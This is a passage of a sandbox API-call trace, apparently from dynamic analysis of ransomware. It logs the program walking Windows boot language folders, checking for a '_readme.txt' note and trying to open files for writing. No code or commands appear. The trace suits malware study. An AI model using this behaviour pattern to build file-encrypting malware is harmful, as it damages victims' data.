Size=0x20) returned 0x31ef540 [0093.071] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.074] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0093.074] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.074] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.074] PathFindFileNameW (pszPath="") returned="" [0093.074] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.074] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.074] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.075] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.075] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0093.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.075] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.075] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.075] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.075] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.075] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0093.075] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.075] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.076] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned=".txt" [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.076] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.076] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.076] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.076] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.077] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.077] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.077] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.077] PathFindFileNameW (pszPath="") returned="" [0093.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.077] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.078] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.078] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.078] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.078] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0093.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.078] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0093.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.078] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.079] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.079] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.079] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0093.079] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.079] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.079] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned=".txt" [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.079] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.079] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.079] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.079] RtlAllocateHeap (HeapHandle=0x680000, 